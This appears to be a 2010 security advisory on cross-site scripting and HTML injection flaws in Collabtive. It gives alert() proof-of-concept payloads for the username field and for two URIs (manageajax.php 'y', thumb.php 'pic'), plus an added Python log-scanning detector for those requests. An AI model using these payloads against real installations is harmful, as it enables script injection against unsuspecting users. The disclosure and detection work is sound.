Collabtive Cross Site Scripting and HTML Injection Vulnerabilities

Attackers can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.

HTML-Injection:
Enter the value <script>alert(/SV/)</script> in the username field under the "change username" functionality.


Cross-site scripting:
The following example URIs are available:

http://www.example.com/manageajax.php?action=newcal&y=<script>alert(/XSS/)</script>
http://www.example.com/thumb.php?pic=<script>alert(/XSS/)</script>
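
A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web-server access-log lines for the y and pic parameters of the two scripts and flags values that do not look like a year or a file path. The log lines are constructed samples, and the expected value shapes, the function names and the log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script/parameter pairs named in the advisory, with the shape a legitimate
# value is ASSUMED to have (y = calendar year, pic = relative file path).
EXPECTED = {
    ("manageajax.php", "y"): re.compile(r"\d{1,4}"),
    ("thumb.php", "pic"): re.compile(r"[\w./ -]+"),
}

# Request portion of a combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2010:10:00:00 +0000] "GET /manageajax.php?action=newcal&y=2010 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jun/2010:10:00:05 +0000] "GET /manageajax.php?action=newcal&y=%3Cscript%3Ealert(/XSS/)%3C/script%3E HTTP/1.1" 200 498',
    '192.0.2.10 - - [01/Jun/2010:10:00:09 +0000] "GET /thumb.php?pic=files/standard/avatar.jpg HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jun/2010:10:00:12 +0000] "GET /collabtive/thumb.php?pic=<script>alert(/XSS/)</script> HTTP/1.1" 200 301',
]


def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for values that break the expected shape."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]  # tolerate installs in a subdirectory
    hits = []
    # parse_qs percent-decodes, so %3Cscript%3E and <script> are treated alike.
    for name, values in parse_qs(url.query).items():
        pattern = EXPECTED.get((script, name))
        if pattern is None:
            continue
        for value in values:
            if not pattern.fullmatch(value):
                hits.append((script, name, value))
    return hits


def scan(lines):
    """Collect findings across an iterable of access-log lines."""
    return [hit for line in lines for hit in suspicious_params(line)]


if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"{script}: parameter {param!r} carries unexpected value {value!r}")
```

Because the check is an allowlist on the value shape rather than a search for script tags, it also flags markup that uses other tags or event-handler attributes.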


 

Copyright 2010, SecurityFocus